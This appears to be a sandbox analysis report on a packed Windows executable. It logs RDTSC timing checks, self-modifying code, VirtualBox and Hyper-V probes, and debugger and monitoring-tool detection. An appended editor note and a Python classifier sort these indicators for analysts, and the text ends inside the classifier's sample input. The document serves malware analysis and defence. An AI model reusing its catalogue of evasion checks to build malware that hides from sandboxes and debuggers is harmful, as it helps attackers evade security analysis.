Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C10FC second address: 70C1177 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+08h], eax 0x0000000c jmp 00007FFB28B7466Eh 0x00000011 mov eax, dword ptr [esi+0Ch] 0x00000014 jmp 00007FFB28B74670h 0x00000019 mov dword ptr [edx+0Ch], eax 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FFB28B7466Eh 0x00000023 adc ah, FFFFFF88h 0x00000026 jmp 00007FFB28B7466Bh 0x0000002b popfd 0x0000002c mov si, 6BFFh 0x00000030 popad 0x00000031 mov eax, dword ptr [esi+10h] 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FFB28B7466Ch 0x0000003d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C1177 second address: 70C117B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C117B second address: 70C1181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C1181 second address: 70C11B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFB28DE2A0Ch 0x00000008 pop esi 0x00000009 mov si, dx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [edx+10h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop edi 0x00000017 jmp 00007FFB28DE2A12h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C11B2 second address: 70C121E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+14h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FFB28B74674h 0x00000013 sub ax, C9D8h 0x00000018 jmp 00007FFB28B7466Bh 0x0000001d popfd 0x0000001e push esi 0x0000001f pushfd 0x00000020 jmp 00007FFB28B7466Fh 0x00000025 adc si, 0C9Eh 0x0000002a jmp 00007FFB28B74679h 0x0000002f popfd 0x00000030 pop eax 0x00000031 popad 0x00000032 mov dword ptr [edx+14h], eax 0x00000035 pushad 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C1320 second address: 70C1326 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C1326 second address: 70C132C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C132C second address: 70C1330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C1330 second address: 70C1344 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+28h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 movsx edx, cx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C1344 second address: 70C134A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C134A second address: 70C13B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74671h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, dword ptr [esi+2Ch] 0x0000000e jmp 00007FFB28B7466Eh 0x00000013 mov dword ptr [edx+2Ch], ecx 0x00000016 pushad 0x00000017 push ecx 0x00000018 mov ecx, edi 0x0000001a pop ebx 0x0000001b mov cl, 34h 0x0000001d popad 0x0000001e mov ax, word ptr [esi+30h] 0x00000022 jmp 00007FFB28B74671h 0x00000027 mov word ptr [edx+30h], ax 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FFB28B74678h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C13B2 second address: 70C13C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C13C1 second address: 70C13C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C13C7 second address: 70C13CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C13CB second address: 70C13CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C13CF second address: 70C13F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [esi+32h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FFB28DE2A18h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C13F9 second address: 70C1467 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ebx, 179E9A60h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov word ptr [edx+32h], ax 0x00000011 jmp 00007FFB28B7466Fh 0x00000016 mov eax, dword ptr [esi+34h] 0x00000019 jmp 00007FFB28B74676h 0x0000001e mov dword ptr [edx+34h], eax 0x00000021 jmp 00007FFB28B74670h 0x00000026 test ecx, 00000700h 0x0000002c jmp 00007FFB28B74670h 0x00000031 jne 00007FFB97032922h 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C1467 second address: 70C146D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C146D second address: 70C1473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C1473 second address: 70C1477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C1477 second address: 70C14BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B7466Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or dword ptr [edx+38h], FFFFFFFFh 0x0000000f pushad 0x00000010 mov edi, ecx 0x00000012 mov ebx, ecx 0x00000014 popad 0x00000015 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushfd 0x0000001d jmp 00007FFB28B74670h 0x00000022 add cx, DEF8h 0x00000027 jmp 00007FFB28B7466Bh 0x0000002c popfd 0x0000002d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C14BE second address: 70C14C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C14C2 second address: 70C14EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, 33FD9BC5h 0x0000000b popad 0x0000000c or dword ptr [edx+40h], FFFFFFFFh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FFB28B74677h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C14EB second address: 70C1542 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FFB28DE2A13h 0x00000013 sbb cx, 7D7Eh 0x00000018 jmp 00007FFB28DE2A19h 0x0000001d popfd 0x0000001e mov edi, eax 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C1542 second address: 70C1548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C1548 second address: 70C154C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 7110D13 second address: 7110D19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 7110D19 second address: 7110D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 7110D1D second address: 7110D37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFB28B7466Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 7110D37 second address: 7110D84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, C4h 0x00000005 pushfd 0x00000006 jmp 00007FFB28DE2A10h 0x0000000b add al, FFFFFFC8h 0x0000000e jmp 00007FFB28DE2A0Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007FFB28DE2A19h 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov bx, 20BEh 0x00000025 mov bl, 8Ah 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 7110D84 second address: 7110D89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70B00DD second address: 70B00E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70B00E1 second address: 70B00F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74674h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70B00F9 second address: 70B00FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70B00FF second address: 70B0103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | RDTSC instruction interceptor: First address: 70B0103 second address: 70B0120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFB28DE2A10h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | RDTSC instruction interceptor: First address: 70B0120 second address: 70B012F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B7466Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | RDTSC instruction interceptor: First address: 70B012F second address: 70B01A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d jmp 00007FFB28DE2A0Ch 0x00000012 call 00007FFB28DE2A12h 0x00000017 pushfd 0x00000018 jmp 00007FFB28DE2A12h 0x0000001d adc si, BDA8h 0x00000022 jmp 00007FFB28DE2A0Bh 0x00000027 popfd 0x00000028 pop esi 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c jmp 00007FFB28DE2A0Fh 0x00000031 pop ebp 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | RDTSC instruction interceptor: First address: 705002F second address: 7050035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | RDTSC instruction interceptor: First address: 7050035 second address: 705006A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFB28DE2A15h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | RDTSC instruction interceptor: First address: 7050656 second address: 705065D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | RDTSC instruction interceptor: First address: 705065D second address: 7050672 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 1A9Ah 0x00000007 mov ecx, edx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ebx, eax 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | RDTSC instruction interceptor: First address: 7050672 second address: 7050678 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | RDTSC instruction interceptor: First address: 7050678 second address: 7050687 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | RDTSC instruction interceptor: First address: 7050687 second address: 705068B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | RDTSC instruction interceptor: First address: 70A08DA second address: 70A08E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | RDTSC instruction interceptor: First address: 70A08E0 second address: 70A08FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B7466Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | RDTSC instruction interceptor: First address: 70A08FA second address: 70A08FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | RDTSC instruction interceptor: First address: 70A08FE second address: 70A0902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | RDTSC instruction interceptor: First address: 70A0902 second address: 70A0908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | RDTSC instruction interceptor: First address: 70A0908 second address: 70A093C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFB28B74670h 0x00000008 pop eax 0x00000009 jmp 00007FFB28B7466Bh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 movzx esi, dx 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop edx 0x0000001a pop eax 0x0000001b popad 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | RDTSC instruction interceptor: First address: 70A093C second address: 70A0942 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | RDTSC instruction interceptor: First address: 70A0942 second address: 70A0948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | RDTSC instruction interceptor: First address: 70A0948 second address: 70A094C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Special instruction interceptor: First address: A20B37 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Special instruction interceptor: First address: BC5843 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Special instruction interceptor: First address: BEC92D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Special instruction interceptor: First address: BD6BE8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_004B9980 rdtsc 0_2_004B9980
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_002D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_002D255D
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_002D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_002D29FF
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_002D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_002D255D
Source: r8nllkNEQX.exe, r8nllkNEQX.exe, 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: r8nllkNEQX.exe, 00000000.00000003.1525807690.0000000001541000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
Source: r8nllkNEQX.exe | Binary or memory string: Hyper-V RAW
Source: r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: r8nllkNEQX.exe, 00000000.00000003.1527894006.0000000006921000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlQ=
Source: r8nllkNEQX.exe, 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: r8nllkNEQX.exe, 00000000.00000003.1599729719.00000000015B4000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1600044768.00000000015B4000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1606989887.00000000015B4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | File opened: NTICE
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | File opened: SICE
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_004B9980 rdtsc 0_2_004B9980
Source: r8nllkNEQX.exe, r8nllkNEQX.exe, 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: TYProgram Manager
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: procmon.exe
Source: r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: wireshark.exe
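Added example, not Joe Sandbox's signature logic and not code from the sample: a small classifier that reads behaviour lines of the kind listed in the anti-VM and anti-debugging sections above and buckets them into evasion categories together with the concrete indicator each line reports, so an analyst can see at a glance which checks a sandbox or debugger setup has to survive. The category names, regexes and ATT&CK ids are mine; the sample lines are copied from this report. Two caveats the classifier encodes: the "Hyper-V RAW" string next to mswsock.dll is the display name of the Hyper-V socket Winsock provider that every stock Windows 10 carries, so on its own it is weak evidence and is scored separately; and NTICE, SICE and SIWVID are the SoftICE driver device names, a check that says more about the packer generation than about the target environment. My reading of the Oreans.vxd and Software\WinLicense strings above is that the binary is wrapped in the Oreans WinLicense/Themida protector, whose stock checks account for the rdtsc pairs, the SoftICE probes and the OllyDbg/Sysinternals window-class lookups, while the key list Num_processor, vbox_first, dbg_sec, installed_apps reads as the payload's own host profile.

```python
"""Classify Joe Sandbox behaviour lines into evasion categories.

Added example for this report: the rules, category names and ATT&CK mapping are
the editor's, not Joe Sandbox's signatures and not code from the sample.
"""
import re
from collections import Counter, defaultdict

# Constructed sample input: behaviour lines copied from the report above, one per
# line, with the source and the observation separated by " | ".
REPORT_LINES = r"""
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | RDTSC instruction interceptor: First address: 70B0103 second address: 70B0120 instructions: 0x00000000 rdtsc 0x00000002 pop edx
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Special instruction interceptor: First address: A20B37 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: r8nllkNEQX.exe, 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
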